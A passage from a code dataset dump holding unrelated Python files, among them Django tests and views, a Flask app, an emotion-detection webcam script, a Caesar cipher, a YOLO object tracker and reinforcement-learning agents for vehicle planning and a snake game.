fringeimage[y_scan, x_scan]\r\n #\r\n\r\n # if all elements removed from fringe, delete fringe\r\n if np.size(fringe[str(m)]) == 0:\r\n del fringe[str(m)]\r\n if m == 0:\r\n yc_fringe = np.polyval(allpf_fringe[m, :], xc)\r\n else:\r\n yc_fringe = np.vstack((yc_fringe, np.polyval(allpf_fringe[m, :], xc)))\r\n\r\n # Allmode - calculate the two fringes surrounding the sphere 
center\r\n listfringes = np.arange(0, len(fringe))\r\n if allmode == 'center':\r\n fringe2 = {}\r\n ball_fringe = yc_fringe - yc\r\n for i in range(0, 2):\r\n index = np.where(min(abs(ball_fringe)) == abs(ball_fringe))[0][0]\r\n fringe2[str(i)] = fringe[str(listfringes[index])]\r\n ball_fringe = np.delete(ball_fringe, index)\r\n listfringes = np.delete(listfringes, index)\r\n return fringe2, scan_width\r\n","sub_path":"Fringefinder/FringefinderFuncs.py","file_name":"FringefinderFuncs.py","file_ext":"py","file_size_in_byte":57495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"318411525","text":"from django.test import TestCase\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\n\nfrom rest_framework.test import APIClient\nfrom rest_framework import status\n\nfrom core.models import Ingredient\nfrom recipe.serializers import IngredientSerializer\n\n\nINGREDIENTS_URL = reverse('recipe:ingredient-list')\n\n\ndef create_user(**kwargs):\n return get_user_model().objects.create_user(**kwargs)\n\n\nclass PublicIngredientsApiTests(TestCase):\n \"\"\" Test the publicly available ingredients API\"\"\"\n\n def setUp(self):\n self.client = APIClient()\n\n def test_login_required(self):\n \"\"\"Test that login is required for retrieving ingredients\"\"\"\n res = self.client.get(INGREDIENTS_URL)\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateTagsApiTests(TestCase):\n \"\"\" Test the private ingredients API\"\"\"\n\n def setUp(self):\n self.user = create_user(\n email='test@test.com',\n password='test123',\n name='name'\n )\n self.client = APIClient()\n self.client.force_authenticate(user=self.user)\n # Authenticated user in the tests\n\n def test_retrieve_ingredient_list(self):\n \"\"\"Test retrieving a list of ingredients\"\"\"\n Ingredient.objects.create(user=self.user, name='Kale')\n Ingredient.objects.create(user=self.user, name='Salt')\n res = self.client.get(INGREDIENTS_URL)\n ingredients = Ingredient.objects.all().order_by('-name')\n serializer = IngredientSerializer(ingredients, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, serializer.data)\n\n def test_ingredients_limited_to_user(self):\n \"\"\"Test retrieving a list of ingredients\"\"\"\n user2 = create_user(email='user2@test.com',\n password='test123',\n name='user2')\n Ingredient.objects.create(user=user2, name='Vinegar')\n ingredient = Ingredient.objects.create(user=self.user, name='Tumeric')\n res = self.client.get(INGREDIENTS_URL)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], ingredient.name)\n\n def test_create_ingredient_successful(self):\n \"\"\"Test create a new ingredient\"\"\"\n payload = {'name': 'Cabbage'}\n self.client.post(INGREDIENTS_URL, payload)\n exists = Ingredient.objects.filter(user=self.user,\n name=payload['name']\n ).exists()\n self.assertTrue(exists)\n\n def test_create_tag_ingredient_invalid(self):\n \"\"\"Test creating invalid ingredient fails\"\"\"\n payload = {'name': ''}\n res = self.client.post(INGREDIENTS_URL, payload)\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n","sub_path":"app/recipe/tests/test_ingredients_api.py","file_name":"test_ingredients_api.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"190702374","text":"import 
cv2\nimport numpy as np\nfrom keras.models import load_model\nimport serial\nser = serial.Serial('COM4', 9600, timeout=1)\nimport os\nimport random\n\nrandom.seed(None)\n\nfaceCascade = cv2.CascadeClassifier('haarcascade_frontalface_alt2.xml')\n\nvideo_capture = cv2.VideoCapture(0)\narea = video_capture.get(3) * video_capture.get(4)\n\nmodel = load_model('models/model_5-49-0.62.hdf5')\nmodel.get_config()\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\nnumFrames = 30\n\nhappyCount = 0\nsadCount = 0\nneutralCount = 0\n\n#happy = os.listdir('happy')\n#sad = os.listdir('sad')\n#neutral = os.listdir('neutral')\n\n#index = 0\n\ntarget = ['angry', 'disgust', 'fear', 'happy', 'sad', 'surprise', 'neutral']\n\nwhile True:\n    ret, frame = video_capture.read()\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    faces = faceCascade.detectMultiScale(gray, scaleFactor=1.1)\n\n    if len(faces) == 0:\n        cv2.imshow('Frame', frame)\n        cv2.waitKey(1)\n        continue\n    else:\n        for (x, y, w, h) in faces:\n            if w*h > 0.06 * area:\n                cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2, 5)\n                face_crop = frame[y:y + h, x:x + w]\n                face_crop = cv2.resize(face_crop, (48, 48))\n                face_crop = cv2.cvtColor(face_crop, cv2.COLOR_BGR2GRAY)\n                face_crop = face_crop.astype('float32') / 255\n                face_crop = np.asarray(face_crop)\n                face_crop = face_crop.reshape(1, 1, face_crop.shape[0], face_crop.shape[1])\n                result = target[np.argmax(model.predict(face_crop))]\n\n                if result == 'happy' or result == 'surprise':\n                    happyCount += 1\n\n                elif result == 'sad' or result == 'angry' or result == 'fear':\n                    sadCount += 1\n\n                elif result == 'neutral':\n                    neutralCount += 1\n\n                numFrames -= 1\n\n                cv2.putText(frame, result, (x, y), font, 1, (200, 0, 0), 3, cv2.LINE_AA)\n                if numFrames == 0:\n                    break\n\n    if numFrames == 0:\n        break\n\n    #print(result)\n    cv2.imshow('Frame', frame)\n    if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n\n\nvideo_capture.release()\ncv2.destroyAllWindows()\n\nemotion = np.argmax(np.array([happyCount, sadCount, neutralCount]))\n\nif emotion == 0:\n    print(\"happy\")\n    ser.write(b'h')\n    ser.close()\n    #with open('test.txt', 'w') as f:\n    #    f.write('happy/' + str(happy[random.randint(0, happy.__len__()-1)]) + '\\n')\nelif emotion == 1:\n    print(\"sad\")\n    ser.write(b's')\n    ser.close()\n    #with open('test.txt', 'w') as f:\n        #f.write('sad/' + str(sad[random.randint(0, sad.__len__()-1)]) + '\\n')\nelse:\n    print(\"neutral\")\n    ser.write(b'n')\n    ser.close()\n    #with open('test.txt', 'w') as f:\n        #f.write('neutral/' + str(neutral[random.randint(0, neutral.__len__()-1)]) + '\\n')\n\n    #cv2.imshow('Video', frame)\n\n\n","sub_path":"Liquid-Player-master/realtime.py","file_name":"realtime.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"188384202","text":"from django.http import HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom .forms import Url_Form\nfrom .models import Short_Url\nfrom .shortner import Shortner\n\n\n# Create your views here.\ndef make(request):\n    form = Url_Form(request.POST)\n    b = \"\"\n    a = \"\"\n    if request.method == 'GET':\n        form = Url_Form\n        return render(request, 'main.html', {'form': form})\n    if request.method == 'POST':\n        new_url = Short_Url.objects.filter(long_url=request.POST['long_url'])\n        if new_url:\n            b = new_url[0]\n        else:\n            if form.is_valid():\n                new_url = form.save(commit=False)\n                new_url.short_url = Shortner().issue_token()\n                a = new_url\n                new_url.save()\n            else:\n                form = Url_Form()\n                a = \"Invalid 
Url\"\n    context = {\n        'form': form,\n        'a': a,\n        'b': b\n    }\n    return render(request, 'main.html', context)\n\n\ndef home(request, token, copy=None):\n    if copy:\n        long_url = Short_Url.objects.filter(short_url=token)[0]\n        long_url.copy2clip(request.META.get('HTTP_REFERER'))\n        return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n    else:\n        long_url = Short_Url.objects.filter(short_url=token)[0]\n        return redirect(long_url.long_url)\n","sub_path":"shorter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"105788372","text":"\"\"\" Compiled: 2020-09-18 10:38:49 \"\"\"\n\n#__src_file__ = \"extensions/confirmation/etc/FConfirmationEventHook.py\"\nfrom FOperationsHook import DefaultHook\nimport types\nfrom FOperationsTypeComparators import PrimitiveTypeComparator\n\nclass ConfirmationEventHook(DefaultHook):\n\n    def __init__(self, moduleName, hookName):\n        DefaultHook.__init__(self, moduleName, hookName, PrimitiveTypeComparator(bool))\n\n    def IsSatisfiedBy(self, fObject, trade=None):\n        if trade is None:\n            return self.CallHook(fObject)\n        return self.CallHook(fObject, trade)","sub_path":"Extensions/Default/FPythonCode/FConfirmationEventHook.py","file_name":"FConfirmationEventHook.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"200221961","text":"# coding:utf-8\nfrom __future__ import division\nimport time\nimport numpy as np\nimport cv2\nfrom PIL import Image, ImageFont, ImageDraw\nfrom yolo import YOLO\nfrom utils.sort import sort_image, Sort\nfrom collections import deque\n\npts = [deque(maxlen=30) for _ in range(9999)]\nnp.random.seed(100)\nCOLORS = np.random.randint(0, 255, size=(200, 3), dtype=\"uint8\")\n\nmp4 = cv2.VideoCapture('/home/bhap/Documents/Video/test3.MP4')\nmodel_path = '/home/bhap/Pytorch_test/YoloV3_Sort/model_data/bdd.pth'\nCAMERA = False\n\ndef main(yolo):\n\n    capture = cv2.VideoCapture(0)\n    tracker = Sort(max_age=10, min_hits=3)  # number of frames a track is stored and of consecutively associated frames\n    fps = 0.0\n\n    while True:\n\n        t1 = time.time()\n\n        if CAMERA:\n            ref, frame = capture.read()\n        else:\n            ref, frame = mp4.read()\n            if ref != True:\n                break\n\n        # convert format BGR2RGB\n        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n        # convert to a PIL Image\n        frame = Image.fromarray(np.uint8(frame))\n        # run detection\n        boxs, classes = yolo.sort_detect_image(frame)\n\n        out_boxes, out_classes, object_id = sort_image(tracker, boxs, classes)\n\n        font = ImageFont.truetype(font='model_data/simhei.ttf',\n                    size=np.floor(2e-2 * frame.size[1] + 0.5).astype('int32'))\n        thickness = (frame.size[0] + frame.size[1]) // 800\n\n        for i, c in enumerate(out_classes):\n            predicted_class = yolo.class_names[c]\n            id = int(object_id[i])\n            left, top, right, bottom = out_boxes[i]\n            color = tuple([int(k) for k in COLORS[id % len(COLORS)]])\n\n            label = '{} id:{}'.format(predicted_class, id)\n            draw = ImageDraw.Draw(frame)\n            label_size = draw.textsize(label, font)\n            label = label.encode('utf-8')\n\n            if top - label_size[1] >= 0:\n                text_origin = np.array([left, top - label_size[1]])\n            else:\n                text_origin = np.array([left, top + 1])\n\n            for j in range(thickness):\n                draw.rectangle(\n                    [left + j, top + j, right - j, bottom - j], outline=color)\n            draw.rectangle(\n                [tuple(text_origin), tuple(text_origin + label_size)], fill=color)\n            draw.text(text_origin, str(label), fill=(0, 0, 0), font=font)\n            del draw\n\n        frame = np.array(frame)\n        frame = cv2.cvtColor(frame, 
cv2.COLOR_RGB2BGR)\n fps = (fps + (1. / (time.time() - t1))) / 2\n frame = cv2.putText(frame, \"fps= %.2f\" % (fps), (0, 40), cv2.FONT_HERSHEY_SCRIPT_SIMPLEX, 1, (0, 255, 0), 2)\n cv2.imshow('mp4', frame)\n\n cv = cv2.waitKey(30) & 0xff\n\n if cv == 27:\n capture.release()\n break\n\nif __name__ == '__main__':\n main(YOLO())","sub_path":"yolo_sort.py","file_name":"yolo_sort.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"496457976","text":"#task_cipher_caesar\n\ndef encode(str, offset = 0):\n\tif not offset: return str\n\tupper_case_letters = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\tupper_q = len(upper_case_letters)\n\tlower_case_letters = \"abcdefghijklmnopqrstuvwxyz\"\n\tlower_q = len(lower_case_letters)\t\n\tencode_str = []\n\tfor char in str:\n\t\tupper_index = upper_case_letters.find(char)\n\t\tlower_index = lower_case_letters.find(char)\n\t\tif upper_index != -1:\n\t\t\tencode_str.append(upper_case_letters[(upper_index+offset)%upper_q])\n\t\telif lower_index != -1:\t\n\t\t\tencode_str.append(lower_case_letters[(lower_index+offset)%lower_q])\n\t\telse:\n\t\t\tencode_str.append(char)\n\treturn ''.join(encode_str)\n\t\ndef decode(str, offset = 0):\n\tif not offset: return str\n\treturn encode(str, -offset)","sub_path":"task_cipher_caesar.py","file_name":"task_cipher_caesar.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"54320979","text":"from django.conf.urls import patterns, include, url\nfrom djangobook.views import hello, current_datetime, hours_ahead, user_browser, display_meta\nfrom books import views\nfrom contact.views import contact\nfrom django.contrib import admin\nadmin.autodiscover()\n\n\nurlpatterns = patterns('',\n\turl(r'^admin/', include(admin.site.urls)),\n\turl(r'^hello/$', hello),\n\turl(r'^time/$', current_datetime),\n\turl(r'^another-time-page/$', current_datetime),\n\turl(r'^time/plus/(\\d{1,2})/$', hours_ahead),\n\turl(r'^browser/$', user_browser),\n\turl(r'^displaymeta/$', display_meta),\n\turl(r'^search/$', views.search),\n\turl(r'^contact-us/$', contact),\n)\n","sub_path":"djangobook/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"196007304","text":"#!/usr/bin/python3\n# Python script that starts a flask application on 0.0.0.0 port 5000/ with\n# variables: Show if number is even or odd\nfrom flask import Flask, render_template\nfrom models import storage\napp = Flask(__name__)\napp.url_map.strict_slashes = False\napp.jinja_env.trim_blocks = True\napp.jinja_env.lstrip_blocks = True\n\n\n@app.teardown_appcontext\ndef teardown_app(exception):\n \"\"\"Calls Storage close on appcontext\"\"\"\n storage.close()\n\n\n@app.route('/states')\ndef states():\n states = []\n for key, values in storage.all('State').items():\n states.append(values)\n return render_template('9-states.html', states=states)\n\n\n@app.route('/states/')\ndef states_var(id=None):\n cities = []\n for key, values in storage.all('City').items():\n if values.state_id == str(id):\n cities.append(values)\n\n name = None\n for key, values in storage.all('State').items():\n if values.id == str(id):\n name = values.name\n\n if len(cities) == 0 and name is None:\n return render_template('9-states.html', err=1)\n\n return render_template('9-states.html', name=name, cities=cities)\n\n\nif 
__name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000)\n","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"355040683","text":"# Settings\nfrom django.conf import settings\n# 3rd party helpers\nfrom requests.exceptions import HTTPError\nfrom typing import Tuple\nfrom lxml.objectify import ElementMaker\nimport json\n# Views\nfrom .utils import Storage\nfrom .json_view import JsonView\n# VDT BE Components\nfrom vdt_python_sdk.views import vdt_python_sdk\n\nE = ElementMaker(namespace=\"http://xml.vidispine.com/schema/vidispine\", annotate=False,\n nsmap={\"vs\": \"http://xml.vidispine.com/schema/vidispine\"})\n\n# Unified responses:\nresponseBE = Tuple[Storage, int]\n\n__author__ = 'anton'\n\n\"\"\" StorageView\n some of the typical API-calls are used here\n\"\"\"\n\n\nclass StoragesView(JsonView):\n def get(self, request) -> responseBE:\n try:\n auth = dict(username=settings.VS_USERNAME, password=settings.VS_PASSWORD)\n\n # Query parameters\n status = request.GET.get('status', None)\n except KeyError:\n return Storage(dict(content=\"No auth\")), 401\n except ValueError:\n raise Exception(\"Invalid request body or header\")\n\n try:\n storages = vdt_python_sdk.get_storages(vsurl=settings.VSAPI_BASE, auth=auth,\n status=status,\n accept='application/json')\n except HTTPError as e:\n return Storage(dict(url=e.request.path_url,\n message=e.response.content.decode('utf-8'))), e.response.status_code\n\n return storages, 200\n\n\nclass StorageImportablesView(JsonView):\n def get(self, request, storage_id: str) -> responseBE:\n try:\n auth = dict(username=settings.VS_USERNAME, password=settings.VS_PASSWORD)\n matrix_params = json.loads(request.GET.get('matrix'))\n first = matrix_params.get('first', None)\n number = matrix_params.get('number', None)\n state = matrix_params.get('state', 'CLOSED')\n except KeyError:\n return Storage(dict(content=\"No auth\")), 401\n except ValueError:\n raise Exception(\"Invalid request body or header\")\n\n try:\n files = vdt_python_sdk.get_storage_importable(vsurl=settings.VSAPI_BASE, auth=auth,\n storage_id=storage_id, state=state,\n first=first,\n number=number,\n accept='application/json')\n except HTTPError as e:\n return Storage(dict(url=e.request.path_url,\n message=e.response.content.decode('utf-8'))), e.response.status_code\n\n returned_files = []\n if files['hits'] != 0:\n for file in files['element']:\n if file['file']['state'] == state:\n returned_files.append(file)\n files['element'] = returned_files\n return files, 200\n\n\nclass FileImportView(JsonView):\n def post(self, request, storage_id: str, file_id: str) -> responseBE:\n try:\n auth = dict(username=settings.VS_USERNAME, password=settings.VS_PASSWORD)\n body = request.body.decode(\"utf-8\")\n data = json.loads(body)\n\n # Voluntary variables\n tag = data.get('tag', None)\n except KeyError:\n return Storage(dict(content=\"No auth\")), 401\n except ValueError:\n raise Exception(\"Invalid request body or header\")\n\n try:\n file_import = vdt_python_sdk.start_file_import(vsurl=settings.VSAPI_BASE, auth=auth,\n storage_id=storage_id, file_id=file_id,\n tag=tag,\n accept='application/json')\n except HTTPError as e:\n return Storage(dict(url=e.request.path_url,\n message=e.response.content.decode('utf-8'))), e.response.status_code\n\n return file_import, 
200\n","sub_path":"app/views/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"245747119","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport csv\nimport pandas as pd\nimport numpy as np\nfrom bs4 import BeautifulSoup\nfrom django.http import JsonResponse\n\ndef parse_csv(csvFile):\n files = csvFile\n data = csv.reader(files.read().splitlines())\n try:\n data = [part for part in data] \n except:\n return 'Not a CSV'\n return data\n\ndef parse_html(html):\n table_soup = BeautifulSoup(html, \"html.parser\")\n r = table_soup.find('tbody').findAll('tr')\n h = table_soup.find('thead').findAll('th')\n return {\"rows\": r, \"header\":h}\n\ndef create_response(data, column_names, sort):\n df = pd.DataFrame(data, columns=column_names)\n if sort:\n df = df.sort(['MPN'])\n unique = df['MPN'].unique().tolist()\n html_table = df.to_html(classes=[\"table\", \"table-striped\", \"table-condensed\"], index=False)\n return {\"html\": html_table, \"unique_mpn\": unique}\n\ndef get_html_text(parsed_html_rows):\n table = []\n for row in parsed_html_rows: \n list_of_data = row.get_text().split(\"\\n\")\n del list_of_data[0]\n list_of_data.pop()\n table.append(list_of_data)\n return table ","sub_path":"tempo_build/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"6229082","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Edward Ahn & Jiyuan Zhou\n\nTrain local planner using TRPO so that a vehicle can follow a\nstraight line.\n\"\"\"\n\nimport numpy as np\n\nfrom rllab.algos.trpo import TRPO\nfrom rllab.baselines.linear_feature_baseline import LinearFeatureBaseline\nfrom rllab.envs.base import Env\nfrom rllab.envs.normalized_env import normalize\nfrom rllab.misc import logger\nfrom rllab.misc.instrument import run_experiment_lite, VariantGenerator\nfrom rllab.misc.resolve import load_class\nfrom rllab.policies.gaussian_mlp_policy import GaussianMLPPolicy\n\nfrom aa_simulation.envs.straight_env import StraightEnv\n\n\ndef run_task(vv, log_dir=None, exp_name=None):\n\n # Load environment\n target_velocity = vv['target_velocity']\n env = normalize(StraightEnv(target_velocity))\n\n # Save variant information for comparison plots\n variant_file = logger.get_snapshot_dir() + '/variant.json'\n logger.log_variant(variant_file, vv)\n\n # Train policy using TRPO\n policy = GaussianMLPPolicy(\n env_spec=env.spec,\n hidden_sizes=(32, 32)\n )\n baseline = LinearFeatureBaseline(env_spec=env.spec)\n algo = TRPO(\n env=env,\n policy=policy,\n baseline=baseline,\n batch_size=1000,\n max_path_length=env.horizon,\n n_itr=800,\n discount=0.99,\n step_size=0.01,\n plot=False,\n )\n algo.train()\n\n\ndef main():\n\n # Set up multiple experiments at once\n vg = VariantGenerator()\n vg.add('target_velocity', [0.7])\n vg.add('seed', [100])\n print('Number of Configurations: ', len(vg.variants()))\n\n # Run each experiment variant\n for vv in vg.variants():\n run_experiment_lite(\n stub_method_call=run_task,\n variant=vv,\n n_parallel=1,\n snapshot_mode='last',\n seed=vv['seed']\n )\n\n\nif __name__ == '__main__':\n 
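# one run_experiment_lite launch per variant from the generator; with n_parallel=1 the sweep runs sequentially\n    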
main()\n","sub_path":"train/train_straight_planner.py","file_name":"train_straight_planner.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"59388556","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\nimport random\nimport os\nimport pygame\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom operator import add\nfrom collections import deque\n\nfrom snake_ai import game_ai\n\n#random.seed(9001)\n\n#NETWORK: input size = 11, hidden size = 256, output size = 3\nclass QNet(nn.Module):\n def __init__(self, input_size, hidden_size, output_size):\n super().__init__()\n self.linear1 = nn.Linear(input_size, hidden_size)\n self.linear2 = nn.Linear(hidden_size, output_size)\n def forward(self, x):\n x = F.relu(self.linear1(x))\n x = self.linear2(x)\n return x\n\nclass DQNAgent_train(object):\n def __init__(self):\n self.gamma = 0.9\n self.epsilon = 0\n self.counter_games = 0\n #replay memory D\n self.memory = deque()\n #action-value function Q \n self.model = QNet(11, 256, 3)\n self.model.train()\n\n #https://arxiv.org/abs/1412.6980 Adam: A Method for Stochastic Optimization\n self.optimizer = optim.Adam(self.model.parameters(), lr=0.001)\n\n self.loss_fn = nn.MSELoss()\n\n def get_state(self, snake):\n state = [\n # immediate danger for snake straight, right, or left\n (snake.x_change == 20 and snake.y_change == 0 and ((list(map(add, snake.snakeSegments[0], [20, 0])) in snake.snakeSegments) or snake.snakeSegments[0][0] + 20 >= (snake.display_width - 20))) or \n (snake.x_change == -20 and snake.y_change == 0 and ((list(map(add, snake.snakeSegments[0], [-20, 0])) in snake.snakeSegments) or snake.snakeSegments[0][0] - 20 < 20)) or \n (snake.x_change == 0 and snake.y_change == -20 and ((list(map(add, snake.snakeSegments[0], [0, -20])) in snake.snakeSegments) or snake.snakeSegments[0][-1] - 20 < 20)) or \n (snake.x_change == 0 and snake.y_change == 20 and ((list(map(add, snake.snakeSegments[0], [0, 20])) in snake.snakeSegments) or snake.snakeSegments[0][-1] + 20 >= (snake.display_height-20))),\n\n (snake.x_change == 0 and snake.y_change == -20 and ((list(map(add,snake.snakeSegments[0],[20, 0])) in snake.snakeSegments) or snake.snakeSegments[0][0] + 20 > (snake.display_width-20))) or \n (snake.x_change == 0 and snake.y_change == 20 and ((list(map(add,snake.snakeSegments[0],[-20,0])) in snake.snakeSegments) or snake.snakeSegments[0][0] - 20 < 20)) or \n (snake.x_change == -20 and snake.y_change == 0 and ((list(map(add,snake.snakeSegments[0],[0,-20])) in snake.snakeSegments) or snake.snakeSegments[0][-1] - 20 < 20)) or \n (snake.x_change == 20 and snake.y_change == 0 and ((list(map(add,snake.snakeSegments[0],[0,20])) in snake.snakeSegments) or snake.snakeSegments[0][-1] + 20 >= (snake.display_height-20))),\n\n (snake.x_change == 0 and snake.y_change == 20 and ((list(map(add,snake.snakeSegments[0],[20,0])) in snake.snakeSegments) or snake.snakeSegments[0][0] + 20 > (snake.display_width-20))) or \n (snake.x_change == 0 and snake.y_change == -20 and ((list(map(add, snake.snakeSegments[0],[-20,0])) in snake.snakeSegments) or snake.snakeSegments[0][0] - 20 < 20)) or \n (snake.x_change == 20 and snake.y_change == 0 and ((list(map(add,snake.snakeSegments[0],[0,-20])) in snake.snakeSegments) or snake.snakeSegments[0][-1] - 20 < 20)) or \n (snake.x_change == -20 and snake.y_change == 0 and 
((list(map(add,snake.snakeSegments[0],[0,20])) in snake.snakeSegments) or snake.snakeSegments[0][-1] + 20 >= (snake.display_height-20))),\n\n # direction snake is currently moving\n snake.x_change == -20, \n snake.x_change == 20, \n snake.y_change == -20, \n snake.y_change == 20,\n\n # fruit location \n snake.fruitPosition[0] < snake.snakePosition[0], # food left\n snake.fruitPosition[0] > snake.snakePosition[0], # food right\n snake.fruitPosition[1] < snake.snakePosition[1], # food up\n snake.fruitPosition[1] > snake.snakePosition[1] # food down\n ]\n\n for i in range(len(state)):\n if state[i]:\n state[i]=1\n else:\n state[i]=0\n\n return np.asarray(state)\n\n def remember(self, state, action, reward, next_state, done):\n self.memory.append([state, action, reward, next_state, done])\n if len(self.memory) > 100000:\n self.memory.popleft()\n\n def replay_memory(self, memory):\n self.counter_games += 1\n if len(memory) > 1000:\n minibatch = random.sample(memory, 1000)\n else:\n minibatch = memory\n \n state, action, reward, next_state, done = zip(*minibatch)\n state = torch.tensor(state, dtype=torch.float) #[1, ... , 0]\n action = torch.tensor(action, dtype=torch.long) # [1, 0, 0]\n reward = torch.tensor(reward, dtype=torch.float) # int\n next_state = torch.tensor(next_state, dtype=torch.float) #[True, ... , False]\n target = reward\n # target = reward + self.gamma * torch.max(self.model(next_state), dim=1)[0]\n if not done:\n target = reward + self.gamma * torch.max(self.model(next_state))\n\n #optimize\n location = [[x] for x in torch.argmax(action, dim=1).numpy()]\n location = torch.tensor(location)\n pred = self.model(state).gather(1, location)#[action]\n pred = pred.squeeze(1)\n loss = self.loss_fn(target, pred)\n loss.backward()\n self.optimizer.step()\n\n def train_short_memory(self, state, action, reward, next_state, done):\n state = torch.tensor(state, dtype=torch.float)\n next_state = torch.tensor(next_state, dtype=torch.float)\n action = torch.tensor(action, dtype=torch.long)\n reward = torch.tensor(reward, dtype=torch.float)\n target = reward\n\n if not done:\n target = reward + self.gamma * torch.max(self.model(next_state))\n\n #optimize\n pred = self.model(state)\n target_f = pred.clone()\n target_f[torch.argmax(action).item()] = target\n\n loss = self.loss_fn(target_f, pred)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n def plot(self, score, mean_per_game):\n from IPython import display\n display.clear_output(wait=True)\n display.display(plt.gcf())\n plt.clf()\n plt.title('Training Results')\n plt.xlabel('Number of Games')\n plt.ylabel('Score')\n plt.plot(score)\n plt.plot(mean_per_game)\n plt.ylim(ymin=0)\n plt.text(len(score)-1, score[-1], str(score[-1]))\n plt.text(len(mean_per_game)-1, mean_per_game[-1], str(mean_per_game[-1]))\n \n def get_action(self, state):\n self.epsilon = 80 - self.counter_games\n final_move = [0, 0, 0]\n if random.randint(0, 200) < self.epsilon:\n move = random.randint(0, 2)\n final_move[move] += 1\n else:\n state0 = torch.tensor(state, dtype=torch.float)\n prediction = self.model(state0)\n move = torch.argmax(prediction).item()\n final_move[move] += 1\n return final_move\n\n\n\ndef train():\n #will save the model for the game that gets the highest score\n save_model = False\n\n #have to set window caption in here lol idk why\n pygame.display.set_caption('SmartSnake')\n\n #make folder for saved models\n if save_model:\n if not os.path.exists('./model'):\n os.makedirs('./model')\n\n #setup for training\n\n #Turn the 
interactive mode on for pyplot\n    plt.ion()\n\n    #Initialize plotting values\n    score_plot = []\n    total_score = 0\n    mean_plot = []\n    record = 0\n\n    #initialize agent and environment\n    agent = DQNAgent_train() #agent == snake\n    game = game_ai() #environment == game/board/emulator\n\n    #max number of games the agent will play while training\n    max_games = 200\n\n    while True:\n        if agent.counter_games > max_games:\n            exit(\"Max number of games reached\")\n\n        #get old state\n        state_old = agent.get_state(game)\n\n        final_move = agent.get_action(state_old)\n\n        #perform new move and get new state\n        reward, done, score = game.frameStep(final_move)\n        state_new = agent.get_state(game)\n\n        #train short memory based on the new action and state\n        agent.train_short_memory(state_old, final_move, reward, state_new, done)\n\n        # store the new data into a long term memory\n        agent.remember(state_old, final_move, reward, state_new, done)\n\n        if done:\n            # One game is over, train on the memory and plot the result.\n            sc = game.reset()\n            total_score += sc\n            agent.replay_memory(agent.memory)\n\n            #print what number game the snake is on and what the score is for the game\n            print('Game', agent.counter_games, ' Score:', sc)\n\n            #update record and save model if new high score\n            #model from iteration w highest score saved as best_model.pth\n            if sc > record:\n                record = sc\n                if save_model:\n                    model_path = os.path.join('./model', 'best_model.pth')\n                    torch.save(agent.model.state_dict(), model_path)\n\n            print('record: ', record)\n            #add plot points for current game: score and updated average\n            score_plot.append(sc)\n            mean = total_score / agent.counter_games\n            mean_plot.append(mean)\n            agent.plot(score_plot, mean_plot)\n\n    plt.ioff()\n    plt.show()\n\n\nif __name__ == '__main__':\n    #load game icon and initialize pygame\n    image = pygame.image.load('snake.png')\n    pygame.display.set_icon(image)\n    pygame.init()\n\n    #call training function!!!!\n    train()\n\n","sub_path":"deepQ_snake/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":9941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
